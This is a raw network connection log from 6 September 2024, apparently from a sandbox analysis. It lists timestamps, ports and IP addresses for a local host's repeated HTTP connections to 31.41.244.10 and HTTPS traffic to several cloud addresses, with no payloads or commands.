Sep 6, 2024 09:58:40.924237013 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:40.924309969 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:40.924782991 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:40.924802065 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:40.946619987 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.947002888 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.951980114 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.951994896 CEST	80	49807	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:40.952521086 CEST	49807	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.952522993 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.952821970 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:40.958333015 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:41.616153955 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.620143890 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.621934891 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.621957064 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.622242928 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.623732090 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.664503098 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.666213989 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:41.666379929 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:41.667217970 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:41.672055960 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:41.883904934 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.883935928 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.883965969 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.884156942 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.884190083 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.884248972 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.884927988 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.884963036 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.885432005 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.886486053 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.886641026 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.887234926 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.887249947 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.887262106 CEST	49808	443	192.168.2.7	13.85.23.86
Sep 6, 2024 09:58:41.887268066 CEST	443	49808	13.85.23.86	192.168.2.7
Sep 6, 2024 09:58:41.895817041 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:41.897836924 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.008419991 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.008796930 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.013641119 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.013669014 CEST	80	49809	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.013772964 CEST	49809	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.013772964 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.013978004 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.018759012 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.705595016 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.705657959 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.706427097 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:42.711286068 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.930799007 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:42.930865049 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.052124023 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.052467108 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.057610989 CEST	80	49810	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.057657003 CEST	49810	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.057704926 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.057769060 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.057905912 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.064053059 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.751699924 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.751959085 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.752623081 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:43.757543087 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.977420092 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:43.977878094 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.091680050 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.092315912 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.098021030 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:44.098047972 CEST	80	49812	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:44.099436998 CEST	49812	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.099453926 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.099611998 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.104382038 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:44.808090925 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:44.808155060 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.808897018 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:44.813720942 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.036900997 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.036982059 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.161022902 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.161364079 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.166184902 CEST	80	49814	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.166222095 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.166241884 CEST	49814	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.166305065 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.166455030 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.171236038 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.881470919 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.881598949 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.882323027 CEST	443	49715	104.98.116.138	192.168.2.7
Sep 6, 2024 09:58:45.882464886 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:45.882524014 CEST	49715	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:58:45.887236118 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:45.997217894 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:46.007328033 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:46.110848904 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.113862038 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.235949993 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.236309052 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.241132975 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.241167068 CEST	80	49815	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.241218090 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.241307974 CEST	49815	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.241365910 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.246140957 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.939636946 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.939711094 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.940519094 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:46.945625067 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:46.975647926 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:46.980619907 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:47.166702032 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:47.166793108 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.272597075 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.272869110 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.278909922 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:47.279035091 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.279244900 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.279702902 CEST	80	49816	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:47.280930996 CEST	49816	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.284157991 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:47.971419096 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:47.971540928 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.972280979 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:47.977044106 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:48.202372074 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:48.202497005 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.312861919 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.313196898 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.317960024 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:48.318043947 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.318068027 CEST	80	49817	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:48.318207026 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.318232059 CEST	49817	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:48.323004961 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.016062975 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.016180992 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.016982079 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.021821976 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.243525028 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.243864059 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.347162008 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.347493887 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.352252960 CEST	80	49818	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.352526903 CEST	49818	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.352571964 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.352747917 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.352849007 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:49.357842922 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:49.969297886 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:49.969326019 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:49.969995022 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:49.971421957 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:49.971435070 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:49.971915007 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:49.971957922 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:49.972490072 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:49.972497940 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:49.973506927 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:49.973510981 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:49.975907087 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:49.975935936 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:49.976058006 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:49.976068974 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:50.052639961 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.052793980 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.053719997 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.058995962 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.279352903 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.279417038 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.387408018 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.387763977 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.392585993 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.392669916 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.392880917 CEST	80	49819	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.392992973 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.393111944 CEST	49819	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:50.397723913 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:50.434880972 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:50.434971094 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:50.435591936 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:50.435656071 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:50.444591045 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:50.444664001 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:50.617630959 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:50.617665052 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:50.617994070 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:50.620203972 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:50.620229006 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:50.620553970 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:50.623888969 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:50.623902082 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:50.624098063 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:50.624176025 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:50.624388933 CEST	49820	443	192.168.2.7	35.190.72.216
Sep 6, 2024 09:58:50.624406099 CEST	443	49820	35.190.72.216	192.168.2.7
Sep 6, 2024 09:58:50.626708031 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:50.626786947 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:50.626852036 CEST	443	49822	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:50.626887083 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:50.626940012 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:50.627047062 CEST	49822	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:50.627118111 CEST	443	49821	34.149.100.209	192.168.2.7
Sep 6, 2024 09:58:50.627263069 CEST	49821	443	192.168.2.7	34.149.100.209
Sep 6, 2024 09:58:50.687803030 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.687827110 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.692969084 CEST	80	49792	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:50.693403959 CEST	80	49786	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:50.693507910 CEST	49792	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.693553925 CEST	49786	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.694233894 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:50.694299936 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:50.694401979 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:50.694495916 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:50.694504976 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:50.706015110 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.710839987 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:50.710915089 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.711081982 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:50.715825081 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.105015993 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.108702898 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.109752893 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.114568949 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.156445026 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.160906076 CEST	49826	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.165780067 CEST	80	49826	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.165853977 CEST	49826	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.166043043 CEST	49826	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.170896053 CEST	80	49826	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.204678059 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.337781906 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.337865114 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.451682091 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.451782942 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:51.453144073 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.453489065 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.454782009 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:51.454802036 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.455053091 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.457659006 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:51.457812071 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.457823038 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:51.457834005 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.458432913 CEST	80	49823	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.458635092 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.464449883 CEST	49823	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.464504957 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.465939045 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.465975046 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.466377020 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:51.466463089 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.466583967 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.466600895 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.469820976 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.471234083 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:51.474919081 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.475594044 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475620985 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.475716114 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475716114 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475723982 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.475769043 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475819111 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475830078 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.475955009 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.475963116 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.564634085 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.565361977 CEST	49826	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.568671942 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.570688963 CEST	80	49826	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.570866108 CEST	49826	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.573570013 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.573676109 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.573873043 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.579783916 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:51.605880976 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.664508104 CEST	443	49824	52.222.236.48	192.168.2.7
Sep 6, 2024 09:58:51.664635897 CEST	49824	443	192.168.2.7	52.222.236.48
Sep 6, 2024 09:58:51.923949957 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.924038887 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.927252054 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.927268028 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.927525043 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.937969923 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.940490007 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.940586090 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.940747023 CEST	443	49828	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.944699049 CEST	49828	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.944883108 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.947614908 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.947638988 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.947942019 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.950498104 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.950601101 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.950686932 CEST	443	49830	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.957444906 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.957479000 CEST	49830	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.957648039 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.958950996 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.962425947 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.962445021 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.962721109 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.962934971 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:51.965487957 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.965584993 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.965655088 CEST	443	49829	35.244.181.201	192.168.2.7
Sep 6, 2024 09:58:51.966016054 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.966031075 CEST	49829	443	192.168.2.7	35.244.181.201
Sep 6, 2024 09:58:51.967683077 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:52.018150091 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:52.057342052 CEST	80	49825	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:52.060791016 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:52.065689087 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:52.115008116 CEST	49825	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:52.154680014 CEST	80	49831	34.107.221.82	192.168.2.7
Sep 6, 2024 09:58:52.177304029 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.177421093 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.180046082 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.184945107 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.207623959 CEST	49831	80	192.168.2.7	34.107.221.82
Sep 6, 2024 09:58:52.409789085 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.410531998 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.525260925 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.525604010 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.530498028 CEST	80	49833	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.531037092 CEST	80	49827	31.41.244.10	192.168.2.7
Sep 6, 2024 09:58:52.531116962 CEST	49827	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.531128883 CEST	49833	80	192.168.2.7	31.41.244.10
Sep 6, 2024 09:58:52.531250000 CEST	49833	80	192.168.2.7	31.41.244.10
